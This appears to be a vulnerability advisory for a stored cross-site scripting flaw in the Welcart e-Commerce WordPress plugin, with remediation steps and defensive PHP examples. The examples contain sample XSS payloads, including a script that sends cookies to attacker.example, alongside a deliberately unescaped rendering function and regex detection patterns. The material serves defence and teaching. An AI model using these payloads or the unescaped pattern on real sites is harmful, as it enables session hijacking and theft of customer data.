Description (NVD)
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in info@welcart Welcart e-Commerce usc-e-shop allows Stored XSS. This issue affects Welcart e-Commerce: from n/a through <= 2.11.16.
Analysis (AI)
Stored cross-site scripting (XSS) in the Welcart e-Commerce WordPress plugin, versions 2.11.16 and earlier, allows an authenticated user to save markup that is later executed in the browsers of other users who view the affected page, which can expose customer data or hijack the session of an administrator reviewing orders or content. The defect lies in page generation: stored user input is written into HTML without escaping for its output context. No public exploit code or active exploitation has been confirmed, and the low EPSS score (0.04%) indicates a low estimated probability of real-world exploitation despite the stored-XSS classification.
Technical Context (AI)
Welcart e-Commerce is a WordPress e-commerce plugin (identified by CPE mapping to wordpress-plugin-usc-e-shop) that stores user-supplied data and renders it during web page generation. The weakness is CWE-79 (Improper Neutralization of Input During Web Page Generation): untrusted data reaches the browser without being encoded for the HTML, attribute, or JavaScript context it is emitted into. Because the plugin does not neutralize HTML and JavaScript metacharacters in stored data, an authenticated attacker can persist a payload in the database that executes whenever another user's page renders that record. Input sanitization on save is a useful second layer, but the defining fix for CWE-79 is escaping on output, since the same stored value may be rendered in several contexts.
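The following is an added illustration of the stored-XSS pattern described above, not code from the Welcart plugin or the advisory. The order record, its field names, and the payloads are constructed for the example, and it uses plain PHP so it runs without WordPress; inside a plugin the same output escaping is done with esc_html(), esc_attr() or wp_kses_post().

```php
<?php
// Constructed "stored" data: what a low-privilege authenticated user could
// have saved (for example a delivery note on an order) and what an
// administrator later views in the back office. Field names are assumptions.
$storedOrder = [
    'id'       => 1001,
    'customer' => 'Alice <script>document.location="https://attacker.example/?c="+document.cookie</script>',
    'note'     => 'leave at door" onmouseover="alert(document.domain)',
];

// Vulnerable pattern (CWE-79): user-controlled values are concatenated
// straight into HTML, both in element content and inside an attribute.
function renderOrderUnsafe(array $order): string
{
    return '<tr>'
        . '<td>' . $order['id'] . '</td>'
        . '<td>' . $order['customer'] . '</td>'
        . '<td><input type="text" value="' . $order['note'] . '"></td>'
        . '</tr>';
}

// Hardened pattern: escape for the output context. ENT_QUOTES is required
// so that a double quote cannot terminate the value="..." attribute.
function escHtml(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function renderOrderSafe(array $order): string
{
    return '<tr>'
        . '<td>' . (int) $order['id'] . '</td>'
        . '<td>' . escHtml($order['customer']) . '</td>'
        . '<td><input type="text" value="' . escHtml($order['note']) . '"></td>'
        . '</tr>';
}

// Template check: parse the rendered fragment the way a browser would and
// look for script elements or on* event-handler attributes. Parsing, rather
// than grepping for "<script", matters because the escaped output still
// contains the literal text "onmouseover=" inside an attribute value.
function containsActiveContent(string $fragment): bool
{
    $doc = new DOMDocument();
    libxml_use_internal_errors(true);
    $doc->loadHTML('<!DOCTYPE html><html><body><table>' . $fragment . '</table></body></html>');
    libxml_clear_errors();
    if ($doc->getElementsByTagName('script')->length > 0) {
        return true;
    }
    $xpath = new DOMXPath($doc);
    foreach ($xpath->query('//@*') as $attr) {
        if (stripos($attr->nodeName, 'on') === 0) {
            return true;
        }
    }
    return false;
}

echo "unsafe:\n" . renderOrderUnsafe($storedOrder) . "\n";
echo "safe:\n" . renderOrderSafe($storedOrder) . "\n";
var_dump(containsActiveContent(renderOrderUnsafe($storedOrder)));
var_dump(containsActiveContent(renderOrderSafe($storedOrder)));
```

Run with `php stored-xss-demo.php`. The unsafe rendering yields a live script element and an onmouseover handler, while the escaped rendering shows the same payload text inertly and passes the DOM check; a check of this shape is cheap to keep in a plugin's template tests.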
Affected Products (AI)
Welcart e-Commerce for WordPress (plugin slug usc-e-shop) is affected in version 2.11.16 and all earlier releases, so any WordPress installation running a plugin version below 2.11.17 is in scope. The Patchstack advisory at https://patchstack.com/database/Wordpress/Plugin/usc-e-shop/vulnerability/wordpress-welcart-e-commerce-plugin-2-11-16-cross-site-scripting-xss-vulnerability gives the affected and fixed version details.
Remediation (AI)
Upgrade Welcart e-Commerce to version 2.11.17 or later, which fixes the stored XSS. The update is available through the WordPress plugin updater or the wordpress.org plugin repository, or from the vendor (info@welcart). Upgrading stops new injections but does not remove payloads already saved, so review user-editable fields stored before the update. As an interim measure, restrict the affected plugin functionality to trusted administrators and monitor the database for suspicious content modifications. The Patchstack advisory linked above provides additional guidance on verifying the fix.
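Two checks a site operator would want for the steps above, written here as an added example and not taken from Welcart, WordPress or Patchstack: confirming the installed version is at or past the fixed release, and a heuristic sweep of stored values for markup that does not belong in customer-entered fields. The fixed version 2.11.17 comes from the advisory; the plugin file path, the field names and the sample rows are assumptions constructed for the example.

```php
<?php
// Fixed release per the Patchstack advisory.
const WELCART_FIXED_VERSION = '2.11.17';

// True when an installed usc-e-shop version is still in the affected range
// (<= 2.11.16). version_compare() orders multi-part versions numerically,
// where a plain string comparison would wrongly put "2.9.0" after "2.11.16".
function welcartIsAffected(string $installedVersion): bool
{
    return version_compare($installedVersion, WELCART_FIXED_VERSION, '<');
}

// Reads the "Version:" header from a plugin's main file, the same field the
// WordPress plugins screen displays. The default path assumes a standard
// install layout and is an assumption for this example.
function welcartInstalledVersion(
    string $pluginFile = '/var/www/html/wp-content/plugins/usc-e-shop/usc-e-shop.php'
): ?string {
    if (!is_readable($pluginFile)) {
        return null;
    }
    $header = file_get_contents($pluginFile, false, null, 0, 8192);
    return preg_match('/^[ \t\/*#@]*Version:\s*(\S+)/mi', $header, $m) ? $m[1] : null;
}

// Heuristic patterns that have no business in customer-entered order or
// member fields. Raw database values are scanned, so literal markup is the
// signal; expect some false positives and review hits by hand.
const SUSPECT_PATTERNS = [
    'script tag'     => '/<script\b/i',
    'event handler'  => '/\bon[a-z]+\s*=/i',
    'javascript uri' => '/javascript\s*:/i',
    'iframe/object'  => '/<(iframe|object|embed)\b/i',
    'svg'            => '/<svg\b/i',
];

// Scans rows (as returned by a SELECT over the plugin's order or member
// tables) and returns one finding per row, field and pattern hit.
function scanStoredRows(array $rows): array
{
    $findings = [];
    foreach ($rows as $row) {
        foreach ($row as $field => $value) {
            if (!is_string($value)) {
                continue;
            }
            foreach (SUSPECT_PATTERNS as $label => $re) {
                if (preg_match($re, $value)) {
                    $findings[] = ['id' => $row['id'] ?? null, 'field' => $field, 'pattern' => $label];
                }
            }
        }
    }
    return $findings;
}

// Constructed rows standing in for a query against the live database.
$rows = [
    ['id' => 1, 'customer' => 'Bob', 'note' => 'ring twice'],
    ['id' => 2, 'customer' => '<svg onload=alert(1)>', 'note' => 'none'],
    ['id' => 3, 'customer' => 'Eve', 'note' => '<a href="javascript:fetch(\'https://attacker.example\')">track</a>'],
];

$installed = welcartInstalledVersion();
echo 'installed: ' . ($installed ?? 'not found at default path') . "\n";
foreach (['2.11.16', '2.11.17', '2.9.3'] as $v) {
    printf("%-8s %s\n", $v, welcartIsAffected($v) ? 'AFFECTED' : 'patched');
}
foreach (scanStoredRows($rows) as $f) {
    printf("row %d field %s: %s\n", $f['id'], $f['field'], $f['pattern']);
}
```

Run with `php welcart-check.php` on the web host, or point welcartInstalledVersion() at the real plugin file. The version check is the authoritative part; the row scan is a triage aid for content saved before the upgrade, and each hit should be inspected rather than deleted automatically, since legitimate values can occasionally contain the strings it looks for.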